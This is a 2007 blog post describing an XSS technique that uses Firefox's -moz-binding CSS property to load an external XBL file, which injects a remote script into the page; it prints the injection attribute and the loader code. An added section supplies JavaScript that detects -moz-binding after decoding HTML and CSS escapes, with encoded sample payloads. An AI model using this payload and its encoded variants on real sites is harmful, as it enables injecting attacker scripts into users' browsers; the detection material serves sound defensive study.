Firefox XBL-JS Loader v1.0
Today I wrote a simple tool to illustrate the binding of a JavaScript document to a page using Firefox's XBL support (-moz-binding) in an XSS context.
The process works as follows:
- Inject attributes as follows (different encodings may be necessary): `<element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />`.
- The browser loads the XBL document.
- The XBL document modifies the DOM to include `<script src="evil_script.js"/>`.
- The browser loads and parses the JavaScript.
The required XBL document (STXSS_XBL.xml) is as follows:
{% highlight xml %}
//This is the STXSS XBL Loader
//Edit this line to the URL of the STXSS Javascript
var url = "http://www.your-site.com/STXSS_JS.js";
//Do not edit below this line
var scr = document.createElement("script");
scr.setAttribute("src",url);
var bodyElement = document.getElementsByTagName("html").item(0);
bodyElement.appendChild(scr);
{% endhighlight %}
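Seen from the filtering side, the note in the first step that "different encodings may be necessary" means a check for `-moz-binding` in a style attribute has to normalise HTML character references and CSS escapes before matching. The following is an added example, not code from the original post, and it goes beyond the literal form shown above to cover those encodings. The function names and the `host.invalid` inputs are assumptions made for illustration, and the check is deliberately conservative: it also flags comment-split names that a real CSS parser would reject.

```javascript
// Added example (not from the original post); all sample inputs are constructed.
const NAMED = new Map(Object.entries(
  { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', lpar: '(', rpar: ')' }));

// Out-of-range code points become U+FFFD instead of throwing.
const safeChar = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '\ufffd');

// Step 1: undo HTML character references, as the HTML parser does for attribute values.
function decodeHtmlEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex) return safeChar(parseInt(hex, 16));
    if (dec) return safeChar(parseInt(dec, 10));
    return NAMED.get(name.toLowerCase()) ?? m;
  });
}

// Step 2: drop CSS comments, then undo CSS backslash escapes (\6d, \00006D, \m).
function decodeCss(s) {
  return s
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/\\(?:([0-9a-f]{1,6})[ \t\r\n\f]?|([^\r\n\f]))/gi,
      (_, hex, ch) => (hex ? safeChar(parseInt(hex, 16)) : ch));
}

// Step 3: look for a -moz-binding declaration in the normalised text.
// Takes the raw style attribute value as it appears in markup.
function findMozBinding(rawStyle) {
  const css = decodeCss(decodeHtmlEntities(rawStyle));
  const decl = /(?:^|[;{\s])-moz-binding\s*:\s*([^;]*)/i.exec(css);
  if (!decl) return { found: false, url: null };
  const url = /url\(\s*(['"]?)(.*?)\1\s*\)/i.exec(decl[1]);
  return { found: true, url: url ? url[2] : null };
}

const SAMPLES = [
  "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');", // form shown in the post
  'color:red;-\\6d oz-b\\69nding : url( "//host.invalid/x.xml#l" )', // CSS escapes
  '-moz-binding&colon;url&#40;&#x27;//host.invalid/x.xml#l&#39;)', // HTML entities
  'color:red;background:url(/img/a.png)', // benign
];
for (const s of SAMPLES) console.log(JSON.stringify(findMozBinding(s)), '<=', s);
```

Matching on the normalised text is a detection aid; an allow-list of permitted CSS properties remains the more robust control for user-supplied style attributes.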
Firefox XBL-JS Loader v1.0 was originally published by Martin Paul Eve at Martin Paul Eve on May 15, 2007.
Identifiers
- UUID: db2f408d-dec8-468d-8747-622d37a59db6
- GUID: https://doi.org/10.59348/2h3ng-xtv52
- URL: https://eve.gd/2007/05/15/firefox-xbl-js-loader-v1-0
Dates
- Issued: 2007-05-15T15:55:58
- Updated: 2007-05-15T15:55:58